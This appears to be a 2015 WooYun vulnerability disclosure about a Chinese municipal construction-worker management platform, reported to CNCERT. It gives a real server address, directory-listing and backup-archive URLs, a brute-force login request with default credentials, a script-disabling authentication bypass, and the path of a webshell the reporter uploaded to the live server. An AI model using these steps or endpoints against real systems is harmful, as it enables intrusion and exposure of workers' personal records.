当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124411

漏洞标题:某市住建局旗下管理系统逻辑错误导致大量敏感信息泄漏

相关厂商:ncert国家互联网应急中心

漏洞作者: 我不是大神

提交时间:2015-07-04 20:48

修复时间:2015-08-22 15:20

公开时间:2015-08-22 15:20

漏洞类型:网络未授权访问

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-04: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开

简要描述:

RT

详细说明:

先开始是打开常熟市建筑局建筑局,无意之间翻进网上信息管理平台,发现服务器是遍历目录的,然后还发现该网站还有文件备份,还有工人的信息档案任意下载,后登录管理页面,发现是js验证页面跳转,之后就是淫荡的禁用了活动脚本,得到了管理员权限,找到了上传点,同样方法禁止跳转,上传webshell,后来又发现该网站程序为某公司的企业建站程序,,后用同样的方法登录了该建站网站的后台,最后发现菜刀直接跨全盘目录,该服务器存放了常熟市企业工人社会管理信息平台,苏州市水利工程建设管理信息平台,张家港建筑工人社会管理信息平台,还有政府平台所签署的合同以及该建站公司所建设的其他管理信息平台的所有备份文件 为防查水表就不下载了基本上他们公司做的政府网站 这个服务器基本都有备份了,希望赶紧修补吧。
首先是遍历目录

http://218.4.112.226


其次是后台帐号可暴力破解

http://218.4.112.226/GiantHopePage/Index.aspx


POST /GiantHopePage/Logintest.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://218.4.112.226/GiantHopePage/Logintest.aspx
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 218.4.112.226
Content-Length: 353
Pragma: no-cache
__VIEWSTATE=%2FwEPDwUKMTY0OTg0MTM3MmRk07TuSDXM6yRYQaChGt6D6N%2FNN94%3D&__EVENTVALIDATION=%2FwEWDAKF%2Bt%2FaCQLRmf%2FbBwLcjsztDgK6q97FCgLRpsCMBAK%2F0J%2BxBQKQzNHTCwKk0ZH2CQL6k6mkAwKKnP7aAgKdlu7NCwK%2BjZDJDpTUbNlMKSh01GuK%2BMtBCqOvPvjI&TextBoxLoginName=§admin§&TBPassword=admin&ButtonGlLogin=%E7%99%BB%E5%BD%95&DropDownListUserName=admin&TextBoxCurrentUser=


在其次是禁用活动脚本绕过页面跳转登录后台

http://218.4.112.226/GiantHopePage/EntranceGL/Index.aspx


http://glpt.cscetc.cn/Cscetc/Wsjgzx_Index.aspx

这个管理平台的所有页面皆可以上方式绕过验证登录后台
服务器档案文件无验证方式可通过遍历目录直接查看

http://218.4.112.226/Fjxx/


http://218.4.112.226/GiantHopePage/ExcelDR/


再然后是备份文件下载

http://218.4.112.226/GiantHope_2013_06_25.rar
http://218.4.112.226/GiantHopePage.rar
http://218.4.112.226/KqjlTimerService.exe
http://218.4.112.226/Sfzydq_drivers_all.rar
http://218.4.112.226/SyscV2.rar
http://218.4.112.226/%E5%B8%B8%E7%86%9F%E5%B8%82%E5%BB%BA%E7%AD%91%E5%B7%A5%E4%BA%BA%E7%A4%BE%E4%BC%9A%E7%AE%A1%E7%90%86%E4%BF%A1%E6%81%AF%E5%B9%B3%E5%8F%B0%202013.rar
http://218.4.112.226/%E7%BE%A4%E8%80%80%E4%BA%8C%E4%BB%A3%E8%AF%81%E9%98%85%E8%AF%BB%E5%99%A8%E9%A9%B1%E5%8A%A8.msi


再然后是禁用活动脚本获得管理权限,后台上传文件无验证可直接getwebshell

http://218.4.112.226/GiantHopePage/GZKFF/CreateGzdr.aspx
http://218.4.112.226/GiantHopePage/GZKFF/ListGzkhdr.aspx
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx
http://218.4.112.226/GiantHopePage/XMGRGL/XMGRAdd.aspx
http://218.4.112.226/GiantHopePage/GZKFF/CreateGzdr.aspx?LoginID=0
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx?LoginID=0&ryId=-0&Type=add
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx?LoginID=0&ryId=&Type=edit
http://218.4.112.226/GiantHopePage/GZKFF/ListGzkhdr.aspx?LoginID=0


再然后菜刀连接跨目录可操作

常熟市企业工人社会管理信息平台
苏州市水利工程建设管理信息平台
张家港建筑工人社会管理信息平台···
还有这些政府平台所签署的合同
以及该建站公司所建设的其他管理信息平台的备份文件 为防查水表就不下载了
基本上他们公司做的网站 这个服务器基本都有备份了

漏洞证明:

遍历.jpg


爆破.jpg


POST /GiantHopePage/Logintest.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://218.4.112.226/GiantHopePage/Logintest.aspx
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 218.4.112.226
Content-Length: 353
Pragma: no-cache
__VIEWSTATE=%2FwEPDwUKMTY0OTg0MTM3MmRk07TuSDXM6yRYQaChGt6D6N%2FNN94%3D&__EVENTVALIDATION=%2FwEWDAKF%2Bt%2FaCQLRmf%2FbBwLcjsztDgK6q97FCgLRpsCMBAK%2F0J%2BxBQKQzNHTCwKk0ZH2CQL6k6mkAwKKnP7aAgKdlu7NCwK%2BjZDJDpTUbNlMKSh01GuK%2BMtBCqOvPvjI&TextBoxLoginName=§admin§&TBPassword=admin&ButtonGlLogin=%E7%99%BB%E5%BD%95&DropDownListUserName=admin&TextBoxCurrentUser=


burp.jpg


http://218.4.112.226/GiantHopePage/EntranceGL/Index.aspx
http://glpt.cscetc.cn/Cscetc/WsBsdt_Index.aspx


活动脚本.png


后台11.jpg


后台22.jpg


后台33.png


后台44.jpg


http://218.4.112.226/Fjxx/
http://218.4.112.226/GiantHopePage/ExcelDR/


照片.jpg


档案.jpg


http://218.4.112.226/GiantHope_2013_06_25.rar
http://218.4.112.226/GiantHopePage.rar
http://218.4.112.226/KqjlTimerService.exe
http://218.4.112.226/Sfzydq_drivers_all.rar
http://218.4.112.226/SyscV2.rar
http://218.4.112.226/%E5%B8%B8%E7%86%9F%E5%B8%82%E5%BB%BA%E7%AD%91%E5%B7%A5%E4%BA%BA%E7%A4%BE%E4%BC%9A%E7%AE%A1%E7%90%86%E4%BF%A1%E6%81%AF%E5%B9%B3%E5%8F%B0%202013.rar
http://218.4.112.226/%E7%BE%A4%E8%80%80%E4%BA%8C%E4%BB%A3%E8%AF%81%E9%98%85%E8%AF%BB%E5%99%A8%E9%A9%B1%E5%8A%A8.msi


备份.jpg


http://218.4.112.226/GiantHopePage/GZKFF/CreateGzdr.aspx
http://218.4.112.226/GiantHopePage/GZKFF/ListGzkhdr.aspx
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx
http://218.4.112.226/GiantHopePage/XMGRGL/XMGRAdd.aspx
http://218.4.112.226/GiantHopePage/GZKFF/CreateGzdr.aspx?LoginID=0
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx?LoginID=0&ryId=-0&Type=add
http://218.4.112.226/GiantHopePage/RyJbXX/RyFjList.aspx?LoginID=0&ryId=&Type=edit
http://218.4.112.226/GiantHopePage/GZKFF/ListGzkhdr.aspx?LoginID=0


上传.jpg


http://218.4.112.226/Fjxx/20150701161834.asp


菜刀.png


菜刀1.png


全是合同,工人信息,企业信息....

修复方案:

好好修复吧

版权声明:转载请注明来源 我不是大神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-07-08 15:19

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无